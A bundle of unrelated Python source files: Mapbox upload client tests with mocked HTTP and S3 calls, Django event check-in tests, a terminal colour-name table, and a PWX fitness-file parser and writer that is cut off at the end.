import mapbox.services.uploads
username = 'testuser'
access_token = 'pk.{0}.test'.format(
base64.b64encode(b'{"u":"testuser"}').decode('utf-8'))
upload_response_body = """
{{"progress": 0,
"modified": "date.test",
"error": null,
"tileset": "{username}.test1",
"complete": false,
"owner": "{username}",
"created": "date.test",
"id": "id.test",
"name": null}}""".format(username=username)
@responses.activate
def test_get_credentials():
query_body = """
{{"key": "_pending/{username}/key.test",
"accessKeyId": "ak.test",
"bucket": "tilestream-tilesets-production",
"url": "https://tilestream-tilesets-production.s3.amazonaws.com/_pending/{username}/key.test",
"secretAccessKey": "sak.test",
"sessionToken": "st.test"}}""".format(username=username)
responses.add(
responses.GET,
'https://api.mapbox.com/uploads/v1/{0}/credentials?access_token={1}'.format(username, access_token),
match_querystring=True,
body=query_body, status=200,
content_type='application/json')
res = mapbox.Uploader(access_token=access_token)._get_credentials()
assert res.status_code == 200
creds = res.json()
assert username in creds['url']
for k in ['key', 'bucket', 'url', 'accessKeyId',
'secretAccessKey', 'sessionToken']:
assert k in creds.keys()
@responses.activate
def test_create():
responses.add(
responses.POST,
'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(username, access_token),
match_querystring=True,
body=upload_response_body, status=201,
content_type='application/json')
res = mapbox.Uploader(access_token=access_token).create(
'http://example.com/test.json', 'test1') # without username prefix
assert res.status_code == 201
job = res.json()
assert job['tileset'] == "{0}.test1".format(username)
res2 = mapbox.Uploader(access_token=access_token).create(
'http://example.com/test.json', 'testuser.test1') # also takes full tileset
assert res2.status_code == 201
job = res2.json()
assert job['tileset'] == "{0}.test1".format(username)
@responses.activate
def test_create_name():
upload_response_body = """
{"progress": 0,
"modified": "date.test",
"error": null,
"tileset": "testuser.test1",
"complete": false,
"owner": "testuser",
"created": "date.test",
"id": "id.test",
"name": "testname"}"""
def request_callback(request):
payload = json.loads(request.body)
assert payload['name'] == "testname"
return (201, {}, upload_response_body)
responses.add_callback(
responses.POST,
'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(username, access_token),
match_querystring=True,
callback=request_callback)
res = mapbox.Uploader(access_token=access_token).create(
'http://example.com/test.json', 'testuser.test1', name="testname")
assert res.status_code == 201
job = res.json()
assert job['name'] == "testname"
@responses.activate
def test_list():
responses.add(
responses.GET,
'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(username, access_token),
match_querystring=True,
body="[{0}]".format(upload_response_body), status=200,
content_type='application/json')
res = mapbox.Uploader(access_token=access_token).list()
assert res.status_code == 200
uploads = res.json()
assert len(uploads) == 1
assert json.loads(upload_response_body) in uploads
@responses.activate
def test_status():
job = json.loads(upload_response_body)
responses.add(
responses.GET,
'https://api.mapbox.com/uploads/v1/{0}/{1}?access_token={2}'.format(username, job['id'], access_token),
match_querystring=True,
body=upload_response_body, status=200,
content_type='application/json')
res = mapbox.Uploader(access_token=access_token).status(job)
assert res.status_code == 200
res = mapbox.Uploader(access_token=access_token).status(job['id'])
assert res.status_code == 200
status = res.json()
assert job == status
@responses.activate
def test_delete():
job = json.loads(upload_response_body)
responses.add(
responses.DELETE,
'https://api.mapbox.com/uploads/v1/{0}/{1}?access_token={2}'.format(username, job['id'], access_token),
match_querystring=True,
body=None, status=204,
content_type='application/json')
res = mapbox.Uploader(access_token=access_token).delete(job)
assert res.status_code == 204
res = mapbox.Uploader(access_token=access_token).delete(job['id'])
assert res.status_code == 204
class MockSession(object):
""" Mocks a boto3 session,
specifically for the purposes of an s3 key put
"""
def __init__(self, *args, **kwargs):
self.bucket = None
self.key = None
pass
def resource(self, name):
self.resource_name = name
return self
def Object(self, bucket, key):
assert self.resource_name == 's3'
self.bucket = bucket
self.key = key
return self
def put(self, Body):
assert self.bucket
assert self.key
self.body = Body
return True
@responses.activate
def test_stage(monkeypatch):
monkeypatch.setattr(mapbox.services.uploads, 'boto3_session', MockSession)
# Credentials
query_body = """
{{"key": "_pending/{username}/key.test",
"accessKeyId": "ak.test",
"bucket": "tilestream-tilesets-production",
"url": "https://tilestream-tilesets-production.s3.amazonaws.com/_pending/{username}/key.test",
"secretAccessKey": "sak.test",
"sessionToken": "st.test"}}""".format(username=username)
responses.add(
responses.GET,
'https://api.mapbox.com/uploads/v1/{0}/credentials?access_token={1}'.format(username, access_token),
match_querystring=True,
body=query_body, status=200,
content_type='application/json')
with open('tests/moors.json', 'r') as src:
stage_url = mapbox.Uploader(access_token=access_token).stage(src)
assert stage_url.startswith("https://tilestream-tilesets-production.s3.amazonaws.com/_pending")
@responses.activate
def test_upload(monkeypatch):
"""Upload a file and create a tileset"""
monkeypatch.setattr(mapbox.services.uploads, 'boto3_session', MockSession)
# Credentials
query_body = """
{{"key": "_pending/{username}/key.test",
"accessKeyId": "ak.test",
"bucket": "tilestream-tilesets-production",
"url": "https://tilestream-tilesets-production.s3.amazonaws.com/_pending/{username}/key.test",
"secretAccessKey": "sak.test",
"sessionToken": "st.test"}}""".format(username=username)
responses.add(
responses.GET,
'https://api.mapbox.com/uploads/v1/{0}/credentials?access_token={1}'.format(username, access_token),
match_querystring=True,
body=query_body, status=200,
content_type='application/json')
responses.add(
responses.POST,
'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(username, access_token),
match_querystring=True,
body=upload_response_body, status=201,
content_type='application/json')
with open('tests/moors.json', 'r') as src:
res = mapbox.Uploader(access_token=access_token).upload(src, 'test1')
assert res.status_code == 201
job = res.json()
assert job['tileset'] == "{0}.test1".format(username)
@responses.activate
def test_upload_error(monkeypatch):
"""Upload a file and create a tileset, fails with 409"""
monkeypatch.setattr(mapbox.services.uploads, 'boto3_session', MockSession)
# Credentials
query_body = """
{{"key": "_pending/{username}/key.test",
"accessKeyId": "ak.test",
"bucket": "tilestream-tilesets-production",
"url": "https://tilestream-tilesets-production.s3.amazonaws.com/_pending/{username}/key.test",
"secretAccessKey": "sak.test",
"sessionToken": "st.test"}}""".format(username=username)
responses.add(
responses.GET,
'https://api.mapbox.com/uploads/v1/{0}/credentials?access_token={1}'.format(username, access_token),
match_querystring=True,
body=query_body, status=200,
content_type='application/json')
responses.add(
responses.POST,
'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(username, access_token),
match_querystring=True,
body="", status=409,
content_type='application/json')
with open('tests/moors.json', 'r') as src:
res = mapbox.Uploader(access_token=access_token).upload(src, 'test1')
assert res.status_code == 409
def test_invalid_fileobj():
"""Must be file object, not path"""
with pytest.raises(mapbox.errors.InvalidFileError):
mapbox.Uploader(access_token=access_token).upload(
'tests/moors.json', 'test1')
| |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from functools import partial
from datetime import datetime, timedelta
from django.utils import timezone
from django.core import mail
from django.core.exceptions import ValidationError
from django.http import HttpResponseForbidden
from apps.core.test_utils import make_request, make_event
from apps.users.models import User
from apps.users.tests import UsersTestCase
from apps.event.models import Event, EventRegistration
from apps.event.views import (events_list_page,
event_email,
register_for_event,
event_admin_check_in_page,
event_user_check_in_poll,
check_in_user_to_event,
increase_rsvp_limit)
class EventTestCase(UsersTestCase):
def setUp(self):
super(EventTestCase, self).setUp()
self.event = make_event(self.group)
class EventTest(UsersTestCase):
def test_cant_save_date_with_invalid_bounds(self):
with self.assertRaises(ValidationError):
right_now = timezone.now()
make_event(self.group,
begins_at=right_now,
ends_at=right_now - timedelta(hours=1))
class EventListTest(EventTestCase):
def test_following_user(self):
request = make_request(user=self.user)
ctx = events_list_page(request)
self.assertEqual(len(ctx['all_events']['event_infos']), 1)
self.assertEqual(len(ctx['immediate_events']['event_infos']), 1)
self.assertFalse(
ctx['immediate_events']['event_infos'][0]['user_is_registered'])
def test_following_user_registered(self):
EventRegistration.objects.create(user=self.user,
event=self.event)
request = make_request(user=self.user)
ctx = events_list_page(request)
self.assertEqual(len(ctx['all_events']['event_infos']), 1)
self.assertEqual(len(ctx['immediate_events']['event_infos']), 1)
self.assertTrue(
ctx['immediate_events']['event_infos'][0]['user_is_registered'])
def test_other_user(self):
request = make_request(user=self.other_user)
ctx = events_list_page(request)
self.assertEqual(len(ctx['all_events']['event_infos']), 1)
self.assertEqual(len(ctx['immediate_events']['event_infos']), 0)
self.assertFalse(
ctx['all_events']['event_infos'][0]['user_is_registered'])
class EventEmailTest(EventTestCase):
def test_sending_email(self):
reg = EventRegistration(event=self.event, user=self.user)
reg.clean_and_save()
request = make_request({
'subject': 'Come to the event',
'body': "It's happening now!"
}, self.other_user, 'POST', group=self.group)
context = event_email(request, self.event.slug)
self.assertEqual(mail.outbox[0].subject, "Come to the event")
self.assertTrue(context['message_sent'])
self.assertEqual(self.event, context['event'])
self.assertEqual(self.group, context['group'])
# Clear the test inbox
mail.outbox = []
class CheckinEventTest(EventTestCase):
def _assert_num_checkins(self, expected_amount):
request = make_request(user=self.user, group=self.group)
context = event_admin_check_in_page(request, self.event.slug)
self.assertEqual(self.event, context['event'])
self.assertEqual(self.group, context['group'])
checkins = sum(1 if did_attend else 0
for user, did_attend in context['users'])
self.assertEqual(expected_amount, checkins)
def test_checkin_checkout(self):
self._assert_num_checkins(0)
request = partial(make_request, user=self.user, group=self.group)
# Checkin (should fail because user has not RSVPed yet)
context = check_in_user_to_event(request(method='POST'),
self.event.slug,
self.user.username)
self.assertTrue(isinstance(context, HttpResponseForbidden))
# RSVP
register_for_event(request(method='POST'), self.event.slug)
# Checkin again (should succeed this time)
check_in_user_to_event(request(method='POST'),
self.event.slug,
self.user.username)
self._assert_num_checkins(1)
# Un-Checkin
check_in_user_to_event(request(method='DELETE'),
self.event.slug,
self.user.username)
self._assert_num_checkins(0)
def test_rsvp_limit_increase(self):
request = make_request(user=self.user, group=self.group)
self.event.max_attendees = 0
self.event.save()
self.event = Event.objects.get(id=self.event.id)
self.assertEqual(0, self.event.max_attendees)
context = increase_rsvp_limit(request, self.event.slug)
self.event = Event.objects.get(id=self.event.id)
self.assertEqual(5, context['max_attendees'])
self.assertEqual(5, self.event.max_attendees)
context = increase_rsvp_limit(request, self.event.slug)
self.event = Event.objects.get(id=self.event.id)
self.assertEqual(10, context['max_attendees'])
self.assertEqual(10, self.event.max_attendees)
context = increase_rsvp_limit(request, self.event.slug)
self.event = Event.objects.get(id=self.event.id)
self.assertEqual(15, context['max_attendees'])
self.assertEqual(15, self.event.max_attendees)
def test_starting_soon(self):
tz = timezone.get_current_timezone()
event = Event(begins_at=datetime(2015, 1, 13, hour=12, tzinfo=tz),
ends_at=datetime(2015, 1, 13, hour=13, tzinfo=tz))
dt = datetime(2015, 1, 13, hour=10, minute=59, tzinfo=tz)
self.assertFalse(event.starting_soon(dt))
# From hour=10, minute=59
# to hour=12, minute=59
for i in xrange(120):
dt = dt + timedelta(minutes=1)
self.assertTrue(event.starting_soon(dt))
# hour=13, minute=0
dt = dt + timedelta(minutes=1)
self.assertFalse(event.starting_soon(dt))
def test_in_progress(self):
tz = timezone.get_current_timezone()
event = Event(begins_at=datetime(2015, 1, 13, hour=12, tzinfo=tz),
ends_at=datetime(2015, 1, 13, hour=13, tzinfo=tz))
dt = datetime(2015, 1, 13, hour=11, minute=59, tzinfo=tz)
self.assertFalse(event.in_progress(dt))
# From hour=11, minute=59
# to hour=12, minute=59
for i in xrange(60):
dt = dt + timedelta(minutes=1)
self.assertTrue(event.in_progress(dt))
# hour=13, minute=0
dt = dt + timedelta(minutes=1)
self.assertFalse(event.in_progress(dt))
def test_field_training_complete(self):
request = make_request(user=self.user, group=self.group, method='POST')
user = self.user
user.field_training_complete = False
user.clean_and_save()
# RSVP
register_for_event(request, self.event.slug)
# Check-in user to normal event
self.event.includes_training = False
self.event.clean_and_save()
check_in_user_to_event(request, self.event.slug, self.user.username)
user = User.objects.get(id=user.id)
self.assertEqual(False, user.field_training_complete)
# Check-in user to training event
self.event.includes_training = True
self.event.clean_and_save()
check_in_user_to_event(request, self.event.slug, self.user.username)
user = User.objects.get(id=user.id)
self.assertEqual(True, user.field_training_complete)
def test_user_checkin_poll(self):
partial_request = partial(make_request, user=self.user,
group=self.group, event=self.event)
# RSVP
register_for_event(partial_request(method='POST'), self.event.slug)
response = event_user_check_in_poll(partial_request(), self.event.slug)
self.assertFalse(response['checked_in'])
# Check-in to event
check_in_user_to_event(partial_request(method='POST'),
self.event.slug,
self.user.username)
response = event_user_check_in_poll(partial_request(), self.event.slug)
self.assertTrue(response['checked_in'])
class MyEventsNowTestCase(UsersTestCase):
def _make_event(self, start_delta, end_delta):
now = timezone.now()
event = make_event(
self.group,
begins_at=now + timedelta(hours=start_delta),
ends_at=now + timedelta(hours=end_delta))
return event
def _get_my_events_now(self, start_delta, end_delta, **kwargs):
args = {
'event': self._make_event(start_delta, end_delta),
'user': self.user,
}
args.update(kwargs)
EventRegistration.objects.create(**args)
events = EventRegistration.my_events_now(self.user)
return events
def assert_included(self, start_delta, end_delta, **kwargs):
events = self._get_my_events_now(start_delta, end_delta, **kwargs)
self.assertEqual(len(events), 1)
def assert_excluded(self, start_delta, end_delta, **kwargs):
events = self._get_my_events_now(start_delta, end_delta, **kwargs)
self.assertEqual(len(events), 0)
def test_included_if_starting_now(self):
self.assert_included(+0, +1)
def test_excluded_if_ended_3_hours_ago(self):
self.assert_excluded(-4, -3)
def test_excluded_if_ended_6_hours_ago(self):
self.assert_excluded(-7, -6)
def test_excluded_if_starting_in_6_hours(self):
self.assert_excluded(+6, +7)
def test_excluded_if_checked_in(self):
self.assert_excluded(+0, +1, did_attend=True)
def test_excluded_if_not_registered(self):
self.assert_excluded(+0, +1, user=self.other_user)
def test_has_started(self):
event = self._make_event(-1, +1)
self.assertTrue(event.has_started)
def test_has_not_started(self):
event = self._make_event(+3, +5)
self.assertFalse(event.has_started)
| |
termcolors = {
'Aqua': '#00ffff',
'Aquamarine1': '#87ffd7',
'Aquamarine3': '#5fd7af',
'Black': '#000000',
'Blue': '#0000ff',
'Blue1': '#0000ff',
'Blue3': '#0000d7',
'BlueViolet': '#5f00ff',
'CadetBlue': '#5fafaf',
'Chartreuse1': '#87ff00',
'Chartreuse2': '#87d700',
'Chartreuse3': '#5fd700',
'Chartreuse4': '#5f8700',
'CornflowerBlue': '#5f87ff',
'Cornsilk1': '#ffffd7',
'Cyan1': '#00ffff',
'Cyan2': '#00ffd7',
'Cyan3': '#00d7af',
'DarkBlue': '#000087',
'DarkCyan': '#00af87',
'DarkGoldenrod': '#af8700',
'DarkGreen': '#005f00',
'DarkKhaki': '#afaf5f',
'DarkMagenta': '#8700af',
'DarkOliveGreen1': '#d7ff87',
'DarkOliveGreen2': '#afff5f',
'DarkOliveGreen3': '#afd75f',
'DarkOrange': '#ff8700',
'DarkOrange3': '#d75f00',
'DarkRed': '#870000',
'DarkSeaGreen': '#87af87',
'DarkSeaGreen1': '#d7ffaf',
'DarkSeaGreen2': '#afffaf',
'DarkSeaGreen3': '#afd787',
'DarkSeaGreen4': '#5faf5f',
'DarkSlateGray1': '#87ffff',
'DarkSlateGray2': '#5fffff',
'DarkSlateGray3': '#87d7d7',
'DarkTurquoise': '#00d7d7',
'DarkViolet': '#af00d7',
'DeepPink1': '#ff00af',
'DeepPink2': '#ff005f',
'DeepPink3': '#d70087',
'DeepPink4': '#af005f',
'DeepSkyBlue1': '#00afff',
'DeepSkyBlue2': '#00afd7',
'DeepSkyBlue3': '#0087d7',
'DeepSkyBlue4': '#005faf',
'DodgerBlue1': '#0087ff',
'DodgerBlue2': '#005fff',
'DodgerBlue3': '#005fd7',
'Fuchsia': '#ff00ff',
'Gold1': '#ffd700',
'Gold3': '#d7af00',
'Green': '#008000',
'Green1': '#00ff00',
'Green3': '#00d700',
'Green4': '#008700',
'GreenYellow': '#afff00',
'Grey': '#808080',
'Grey0': '#000000',
'Grey100': '#ffffff',
'Grey11': '#1c1c1c',
'Grey15': '#262626',
'Grey19': '#303030',
'Grey23': '#3a3a3a',
'Grey27': '#444444',
'Grey3': '#080808',
'Grey30': '#4e4e4e',
'Grey35': '#585858',
'Grey37': '#5f5f5f',
'Grey39': '#626262',
'Grey42': '#6c6c6c',
'Grey46': '#767676',
'Grey50': '#808080',
'Grey53': '#878787',
'Grey54': '#8a8a8a',
'Grey58': '#949494',
'Grey62': '#9e9e9e',
'Grey63': '#af87af',
'Grey66': '#a8a8a8',
'Grey69': '#afafaf',
'Grey7': '#121212',
'Grey70': '#b2b2b2',
'Grey74': '#bcbcbc',
'Grey78': '#c6c6c6',
'Grey82': '#d0d0d0',
'Grey84': '#d7d7d7',
'Grey85': '#dadada',
'Grey89': '#e4e4e4',
'Grey93': '#eeeeee',
'Honeydew2': '#d7ffd7',
'HotPink': '#ff5fd7',
'HotPink2': '#d75faf',
'HotPink3': '#d75f87',
'IndianRed': '#d75f5f',
'IndianRed1': '#ff5f87',
'Khaki1': '#ffff87',
'Khaki3': '#d7d75f',
'LightCoral': '#ff8787',
'LightCyan1': '#d7ffff',
'LightCyan3': '#afd7d7',
'LightGoldenrod1': '#ffff5f',
'LightGoldenrod2': '#ffd787',
'LightGoldenrod3': '#d7af5f',
'LightGreen': '#87ff87',
'LightPink1': '#ffafaf',
'LightPink3': '#d78787',
'LightPink4': '#875f5f',
'LightSalmon1': '#ffaf87',
'LightSalmon3': '#d7875f',
'LightSeaGreen': '#00afaf',
'LightSkyBlue1': '#afd7ff',
'LightSkyBlue3': '#87afd7',
'LightSlateBlue': '#8787ff',
'LightSlateGrey': '#8787af',
'LightSteelBlue': '#afafff',
'LightSteelBlue1': '#d7d7ff',
'LightSteelBlue3': '#afafd7',
'LightYellow3': '#d7d7af',
'Lime': '#00ff00',
'Magenta1': '#ff00ff',
'Magenta2': '#ff00d7',
'Magenta3': '#d700d7',
'Maroon': '#800000',
'MediumOrchid': '#af5fd7',
'MediumOrchid1': '#ff5fff',
'MediumOrchid3': '#af5faf',
'MediumPurple': '#8787d7',
'MediumPurple1': '#af87ff',
'MediumPurple2': '#af87d7',
'MediumPurple3': '#875fd7',
'MediumPurple4': '#5f5f87',
'MediumSpringGreen': '#00ffaf',
'MediumTurquoise': '#5fd7d7',
'MediumVioletRed': '#af0087',
'MistyRose1': '#ffd7d7',
'MistyRose3': '#d7afaf',
'NavajoWhite1': '#ffd7af',
'NavajoWhite3': '#afaf87',
'Navy': '#000080',
'NavyBlue': '#00005f',
'Olive': '#808000',
'Orange1': '#ffaf00',
'Orange3': '#d78700',
'Orange4': '#875f00',
'OrangeRed1': '#ff5f00',
'Orchid': '#d75fd7',
'Orchid1': '#ff87ff',
'Orchid2': '#ff87d7',
'PaleGreen1': '#afff87',
'PaleGreen3': '#87d787',
'PaleTurquoise1': '#afffff',
'PaleTurquoise4': '#5f8787',
'PaleVioletRed1': '#ff87af',
'Pink1': '#ffafd7',
'Pink3': '#d787af',
'Plum1': '#ffafff',
'Plum2': '#d7afff',
'Plum3': '#d787d7',
'Plum4': '#875f87',
'Purple': '#af00ff',
'Purple3': '#5f00d7',
'Purple4': '#5f00af',
'Red': '#ff0000',
'Red1': '#ff0000',
'Red3': '#d70000',
'RosyBrown': '#af8787',
'RoyalBlue1': '#5f5fff',
'Salmon1': '#ff875f',
'SandyBrown': '#ffaf5f',
'SeaGreen1': '#5fffaf',
'SeaGreen2': '#5fff5f',
'SeaGreen3': '#5fd787',
'Silver': '#c0c0c0',
'SkyBlue1': '#87d7ff',
'SkyBlue2': '#87afff',
'SkyBlue3': '#5fafd7',
'SlateBlue1': '#875fff',
'SlateBlue3': '#5f5fd7',
'SpringGreen1': '#00ff87',
'SpringGreen2': '#00ff5f',
'SpringGreen3': '#00d75f',
'SpringGreen4': '#00875f',
'SteelBlue': '#5f87af',
'SteelBlue1': '#5fd7ff',
'SteelBlue3': '#5f87d7',
'Tan': '#d7af87',
'Teal': '#008080',
'Thistle1': '#ffd7ff',
'Thistle3': '#d7afd7',
'Turquoise2': '#00d7ff',
'Turquoise4': '#008787',
'Violet': '#d787ff',
'Wheat1': '#ffffaf',
'Wheat4': '#87875f',
'White': '#ffffff',
'Yellow': '#ffff00',
'Yellow1': '#ffff00',
'Yellow2': '#d7ff00',
'Yellow3': '#d7d700',
'Yellow4': '#87af00'
}
| |
from lxml import etree
import copy
import dateutil.parser
from datetime import timedelta
from .interchange import WaypointType, ActivityType, Activity, Waypoint, Location, Lap, ActivityStatistic, ActivityStatisticUnit
class PWXIO:
Namespaces = {
None: "http://www.peaksware.com/PWX/1/0"
}
_sportTypeMappings = {
"Bike": ActivityType.Cycling,
"Run": ActivityType.Running,
"Walk": ActivityType.Walking,
"Swim": ActivityType.Swimming,
"Mountain Bike": ActivityType.MountainBiking,
"XC Ski": ActivityType.CrossCountrySkiing,
"Rowing": ActivityType.Rowing,
"Other": ActivityType.Other
}
_reverseSportTypeMappings = {
ActivityType.Cycling: "Bike",
ActivityType.Running: "Run",
ActivityType.Walking: "Walk",
ActivityType.Hiking: "Walk", # Hilly walking?
ActivityType.Swimming: "Swim",
ActivityType.MountainBiking: "Mountain Bike",
ActivityType.CrossCountrySkiing: "XC Ski",
ActivityType.DownhillSkiing: "XC Ski", # For whatever reason there's no "ski" type
ActivityType.Rowing: "Rowing",
ActivityType.Other: "Other",
}
def Parse(pwxData, activity=None):
ns = copy.deepcopy(PWXIO.Namespaces)
ns["pwx"] = ns[None]
del ns[None]
activity = activity if activity else Activity()
try:
root = etree.XML(pwxData)
except:
root = etree.fromstring(pwxData)
xworkout = root.find("pwx:workout", namespaces=ns)
xsportType = xworkout.find("pwx:sportType", namespaces=ns)
if xsportType is not None:
sportType = xsportType.text
if sportType in PWXIO._sportTypeMappings:
if PWXIO._sportTypeMappings[sportType] != ActivityType.Other:
activity.Type = PWXIO._sportTypeMappings[sportType]
xtitle = xworkout.find("pwx:title", namespaces=ns)
if xtitle is not None:
activity.Name = xtitle.text
xcmt = xworkout.find("pwx:cmt", namespaces=ns)
if xcmt is not None:
activity.Notes = xcmt.text
xtime = xworkout.find("pwx:time", namespaces=ns)
if xtime is None:
raise ValueError("Can't parse PWX without time")
activity.StartTime = dateutil.parser.parse(xtime.text)
activity.GPS = False
def _minMaxAvg(xminMaxAvg):
return {"min": float(xminMaxAvg.attrib["min"]) if "min" in xminMaxAvg.attrib else None, "max": float(xminMaxAvg.attrib["max"]) if "max" in xminMaxAvg.attrib else None, "avg": float(xminMaxAvg.attrib["avg"]) if "avg" in xminMaxAvg.attrib else None} # Most useful line ever
def _readSummaryData(xsummary, obj, time_ref):
obj.StartTime = time_ref + timedelta(seconds=float(xsummary.find("pwx:beginning", namespaces=ns).text))
obj.EndTime = obj.StartTime + timedelta(seconds=float(xsummary.find("pwx:duration", namespaces=ns).text))
# "duration - durationstopped = moving time. duration stopped may be zero." - Ben
stoppedEl = xsummary.find("pwx:durationstopped", namespaces=ns)
if stoppedEl is not None:
obj.Stats.TimerTime = ActivityStatistic(ActivityStatisticUnit.Seconds, value=(obj.EndTime - obj.StartTime).total_seconds() - float(stoppedEl.text))
else:
obj.Stats.TimerTime = ActivityStatistic(ActivityStatisticUnit.Seconds, value=(obj.EndTime - obj.StartTime).total_seconds())
hrEl = xsummary.find("pwx:hr", namespaces=ns)
if hrEl is not None:
obj.Stats.HR = ActivityStatistic(ActivityStatisticUnit.BeatsPerMinute, **_minMaxAvg(hrEl))
spdEl = xsummary.find("pwx:spd", namespaces=ns)
if spdEl is not None:
obj.Stats.Speed = ActivityStatistic(ActivityStatisticUnit.MetersPerSecond, **_minMaxAvg(spdEl))
pwrEl = xsummary.find("pwx:pwr", namespaces=ns)
if pwrEl is not None:
obj.Stats.Power = ActivityStatistic(ActivityStatisticUnit.Watts, **_minMaxAvg(pwrEl))
cadEl = xsummary.find("pwx:cad", namespaces=ns)
if cadEl is not None:
obj.Stats.Cadence = ActivityStatistic(ActivityStatisticUnit.RevolutionsPerMinute, **_minMaxAvg(cadEl))
distEl = xsummary.find("pwx:dist", namespaces=ns)
if distEl is not None:
obj.Stats.Distance = ActivityStatistic(ActivityStatisticUnit.Meters, value=float(distEl.text))
altEl = xsummary.find("pwx:alt", namespaces=ns)
if altEl is not None:
obj.Stats.Elevation = ActivityStatistic(ActivityStatisticUnit.Meters, **_minMaxAvg(altEl))
climbEl = xsummary.find("pwx:climbingelevation", namespaces=ns)
if climbEl is not None:
obj.Stats.Elevation.update(ActivityStatistic(ActivityStatisticUnit.Meters, gain=float(climbEl.text)))
descEl = xsummary.find("pwx:descendingelevation", namespaces=ns)
if descEl is not None:
obj.Stats.Elevation.update(ActivityStatistic(ActivityStatisticUnit.Meters, loss=float(descEl.text)))
tempEl = xsummary.find("pwx:temp", namespaces=ns)
if tempEl is not None:
obj.Stats.Temperature = ActivityStatistic(ActivityStatisticUnit.DegreesCelcius, **_minMaxAvg(tempEl))
_readSummaryData(xworkout.find("pwx:summarydata", namespaces=ns), activity, time_ref=activity.StartTime)
laps = []
xsegments = xworkout.findall("pwx:segment", namespaces=ns)
for xsegment in xsegments:
lap = Lap()
_readSummaryData(xsegment.find("pwx:summarydata", namespaces=ns), lap, time_ref=activity.StartTime)
laps.append(lap)
if len(laps) == 1:
laps[0].Stats.update(activity.Stats)
activity.Stats = laps[0].Stats
elif not len(laps):
laps = [Lap(startTime=activity.StartTime, endTime=activity.EndTime, stats=activity.Stats)]
xsamples = xworkout.findall("pwx:sample", namespaces=ns)
currentLapIdx = 0
for xsample in xsamples:
wp = Waypoint()
wp.Timestamp = activity.StartTime + timedelta(seconds=float(xsample.find("pwx:timeoffset", namespaces=ns).text))
# Just realized how terribly inefficient doing the search-if-set pattern is. I'll change everything over to iteration... eventually
for xsampleData in xsample:
tag = xsampleData.tag[34:] # {http://www.peaksware.com/PWX/1/0} is 34 chars. I'll show myself out.
if tag == "hr":
wp.HR = int(xsampleData.text)
elif tag == "spd":
wp.Speed = float(xsampleData.text)
elif tag == "pwr":
wp.Power = float(xsampleData.text)
elif tag == "cad":
wp.Cadence = int(xsampleData.text)
elif tag == "dist":
wp.Distance = float(xsampleData.text)
elif tag == "temp":
wp.Temp = float(xsampleData.text)
elif tag == "alt":
if wp.Location is None:
wp.Location = Location()
wp.Location.Altitude = float(xsampleData.text)
elif tag == "lat":
if wp.Location is None:
wp.Location = Location()
wp.Location.Latitude = float(xsampleData.text)
elif tag == "lon":
if wp.Location is None:
wp.Location = Location()
wp.Location.Longitude = float(xsampleData.text)
assert wp.Location is None or ((wp.Location.Latitude is None) == (wp.Location.Longitude is None)) # You never know...
if wp.Location and wp.Location.Latitude is not None:
activity.GPS = True
# If we've left one lap, move to the next immediately
while currentLapIdx < len(laps) - 1 and wp.Timestamp > laps[currentLapIdx].EndTime:
currentLapIdx += 1
laps[currentLapIdx].Waypoints.append(wp)
activity.Laps = laps
activity.Stationary = activity.CountTotalWaypoints() == 0
if not activity.Stationary:
flatWp = activity.GetFlatWaypoints()
flatWp[0].Type = WaypointType.Start
flatWp[-1].Type = WaypointType.End
if activity.EndTime < flatWp[-1].Timestamp: # Work around the fact that TP doesn't preserve elapsed time.
activity.EndTime = flatWp[-1].Timestamp
return activity
def Dump(activity):
xroot = etree.Element("pwx", nsmap=PWXIO.Namespaces)
xroot.attrib["creator"] = "tapiriik"
xroot.attrib["version"] = "1.0"
xworkout = etree.SubElement(xroot, "workout")
if activity.Type in PWXIO._reverseSportTypeMappings:
etree.SubElement(xworkout, "sportType").text = PWXIO._reverseSportTypeMappings[activity.Type]
if activity.Name:
etree.SubElement(xworkout, "title").text = activity.Name
if activity.Notes:
etree.SubElement(xworkout, "cmt").text = activity.Notes
xdevice = etree.SubElement(xworkout, "device")
# By Ben's request
etree.SubElement(xdevice, "make").text = "tapiriik"
if hasattr(activity, "SourceConnection"):
etree.SubElement(xdevice, "model").text = activity.SourceConnection.Service.ID
etree.SubElement(xworkout, "time").text = activity.StartTime.replace(tzinfo=None).isoformat()
def _writeMinMaxAvg(xparent, name, stat, naturalValue=False):
if stat.Min is None and stat.Max is None and stat.Average is None:
return
xstat = etree.SubElement(xparent, name)
if stat.Min is not None:
xstat.attrib["min"] = str(stat.Min)
if stat.Max is not None:
xstat.attrib["max"] = str(stat.Max)
if stat.Average is not None:
xstat.attrib["avg"] = str(stat.Average)
def _writeSummaryData(xparent, obj, time_ref):
xsummary = etree.SubElement(xparent, "summarydata")
etree.SubElement(xsummary, "beginning").text = str((obj.StartTime - time_ref).total_seconds())
etree.SubElement(xsummary, "duration").text = str((obj.EndTime - obj.StartTime).total_seconds())
if obj.Stats.TimerTime.Value is not None:
etree.SubElement(xsummary, "durationstopped").text = str((obj.EndTime - obj.StartTime).total_seconds() - obj.Stats.TimerTime.asUnits(ActivityStatisticUnit.Seconds).Value)
altStat = obj.Stats.Elevation.asUnits(ActivityStatisticUnit.Meters)
_writeMinMaxAvg(xsummary, "hr", obj.Stats.HR.asUnits(ActivityStatisticUnit.BeatsPerMinute))
_writeMinMaxAvg(xsummary, "spd", obj.Stats.Speed.asUnits(ActivityStatisticUnit.MetersPerSecond))
_writeMinMaxAvg(xsummary, "pwr", obj.Stats.Power.asUnits(ActivityStatisticUnit.Watts))
if obj.Stats.Cadence.Min is not None or obj.Stats.Cadence.Max is not None or obj.Stats.Cadence.Average is not None:
_writeMinMaxAvg(xsummary, "cad", obj.Stats.Cadence.asUnits(ActivityStatisticUnit.RevolutionsPerMinute))
else:
_writeMinMaxAvg(xsummary, "cad", obj.Stats.RunCadence.asUnits(ActivityStatisticUnit.StepsPerMinute))
if obj.Stats.Distance.Value:
etree.SubElement(xsummary, "dist").text = str(obj.Stats.Distance.asUnits(ActivityStatisticUnit.Meters).Value)
_writeMinMaxAvg(xsummary, "alt", altStat)
_writeMinMaxAvg(xsummary, "temp", obj.Stats.Temperature.asUnits(ActivityStatisticUnit.DegreesCelcius))
if altStat.Gain is not None:
etree.SubElement(xsummary, "climbingelevation").text = str(altStat.Gain)
